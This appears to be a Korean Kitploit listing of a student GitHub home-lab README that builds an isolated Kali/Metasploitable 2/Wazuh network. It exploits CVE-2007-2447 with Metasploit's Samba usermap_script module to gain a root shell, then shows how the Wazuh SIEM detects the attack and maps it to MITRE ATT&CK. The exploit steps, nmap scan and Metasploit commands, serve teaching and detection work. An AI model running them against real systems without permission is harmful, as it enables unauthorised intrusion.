Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — 격리된 AD/Linux 공격 랩: Metasploit을 통해 CVE-2007-2447 악용, Wazuh SIEM으로 탐지 및 MITRE ATT&CK(T1190, T1059)에 매핑 | Kitploit
도구/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
ReconnaissanceExploit FrameworksVulnerability AnalysisExploitationPenetration TestingThreat IntelligenceIntrusion DetectionLearning & EducationLog Analysis

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Labs & Practice
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

격리된 AD/Linux 공격 랩: Metasploit을 통해 CVE-2007-2447 악용, Wazuh SIEM으로 탐지 및 MITRE ATT&CK(T1190, T1059)에 매핑

저장소 보기
1025일 전아직 검토되지 않음

🛡️ CVE-2007-2447 악용 및 SIEM 탐지 랩 (Wazuh + MITRE ATT&CK)

B.Tech 프로젝트 (BTP) | IIIT Pune 기반: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi

무료 오픈소스 도구를 사용하여 단일 머신에 구축한 완전한 기능의 사이버 보안 홈 랩입니다. 이 랩은 실제 공격 수명 주기(정찰 → 악용 → 탐지)를 시뮬레이션하며, SIEM이 공격을 실시간으로 탐지하고 MITRE ATT&CK 프레임워크에 매핑하는 방법을 보여줍니다.


📐 랩 아키텍처

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser
VM역할IP도구
Kali Linux 2026.1공격자10.0.0.1Nmap, Metasploit
Metasploitable 2피해자10.0.0.220개 이상의 취약점
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5

🧰 도구 및 기술


🔧 설정 가이드

사전 요구사항

  • 최소 16 GB RAM을 갖춘 머신 (3개 VM이 모두 동시에 실행됨)
  • VirtualBox 7.x 설치
  • 약 50 GB의 여유 디스크 공간

1단계 — VirtualBox 네트워크 설정

VirtualBox에서 cyberlab이라는 **내부 네트워크(Internal Network)**를 생성합니다. 세 VM 모두 이 어댑터를 사용합니다. Ubuntu/Wazuh VM에는 브라우저에서 대시보드에 접근할 수 있도록 **호스트 전용 어댑터(Host-Only Adapter)**를 추가로 할당합니다.


2단계 — Kali Linux (공격자)

  1. Kali Linux VirtualBox 이미지 다운로드
  2. 이미지를 가져온 후 cyberlab 내부 네트워크 어댑터 할당
  3. 고정 IP 설정:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. 네트워킹 재시작: sudo systemctl restart networking

3단계 — Metasploitable 2 (피해자)

  1. Metasploitable 2 다운로드
  2. VirtualBox로 가져온 후 cyberlab 네트워크 할당
  3. 고정 IP 설정:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Metasploitable 2를 인터넷에 절대 노출하지 마세요. 의도적으로 보안에 취약하게 만들어졌습니다.


4단계 — Ubuntu + Wazuh SIEM (방어자)

  1. Ubuntu Server 22.04 설치
  2. 어댑터 2개 할당: cyberlab 내부 + 호스트 전용(Host-Only)
  3. netplan으로 고정 IP 구성 (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Wazuh 설치 (단일 노드):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. 대시보드 접속: https://192.168.56.103 (호스트 브라우저에서)

5단계 — Syslog를 통해 Metasploitable을 Wazuh에 연결

Metasploitable 2는 Wazuh 에이전트를 실행할 수 없으므로, 에이전트 없는 모니터링을 위해 syslog 전달을 구성합니다:

Metasploitable에서 /etc/rsyslog.conf에 추가:

root@kitploit:~
*.* @10.0.0.3:514

Wazuh (Ubuntu)에서 /var/ossec/etc/ossec.conf에 syslog 입력을 활성화:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Wazuh 재시작: sudo systemctl restart wazuh-manager


⚔️ 공격 시뮬레이션

페이즈 1 — 정찰 (Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Metasploitable 2에서 발견된 주요 서비스:

열린 포트 20개 이상 발견. OS 핑거프린팅 결과: Linux 2.6.x


페이즈 2 — 악용 (Metasploit)

취약점: CVE-2007-2447 — Samba usermap_script 명령 주입

Samba 3.0.0–3.0.25rc3에서 잘못된 형식의 MS-RPC 요청을 통해 인증 없이 원격 코드 실행을 허용합니다.

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

페이즈 3 — 탐지 (Wazuh SIEM)

악용 이후 Wazuh는 이벤트를 자동으로 탐지하여 MITRE ATT&CK에 매핑했습니다:

탐지된 총 이벤트: 55개 이상

대시보드 접속: https://192.168.56.103 → Security Events → MITRE ATT&CK


📊 핵심 결과

  • ✅ 격리된 환경에서 전체 공격 수명 주기를 성공적으로 재현
  • ✅ CVE-2007-2447로 수 초 만에 인증 없는 루트 셸 획득
  • ✅ Wazuh SIEM이 모든 공격을 실시간으로 탐지하고 MITRE ATT&CK에 매핑
  • ✅ Syslog 전달로 레거시 Metasploitable 시스템의 에이전트 없는 모니터링 구현
  • ✅ 전체 랩이 16 GB RAM을 갖춘 단일 호스트 머신에서 실행

📁 저장소 구조

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 참고 문헌

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ 면책 조항

이 랩은 공격 시뮬레이션 중 인터넷에 연결되지 않은 완전히 격리된 가상 머신으로만 구성됩니다. 모든 도구와 기법은 통제된 환경에서 교육 목적으로만 사용됩니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템에서 어떤 공격 기법도 재현하려 하지 마십시오.


발표: Harshita Verma | IIIT Pune

도구 다운로드
도구버전용도
VirtualBox7.x하이퍼바이저 — 단일 호스트에서 모든 VM 실행
Kali Linux2026.1침투 테스트 OS (공격용)
Metasploitable 2v2.0의도적으로 취약하게 만든 대상
Wazuhv4.7.5오픈소스 SIEM (방어용)
Nmap최신네트워크/포트 스캐닝
Metasploit Framework최신악용 프레임워크
포트서비스버전
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
규칙 ID설명MITRE 기법전술
5402ROOT로의 sudo 실행 성공T1548.003권한 상승
5501PAM: 로그인 세션 열림T1078초기 접근 / 지속성
5502PAM: 로그인 세션 닫힘T1078방어 회피
502Wazuh 서버 시작—탐지 활성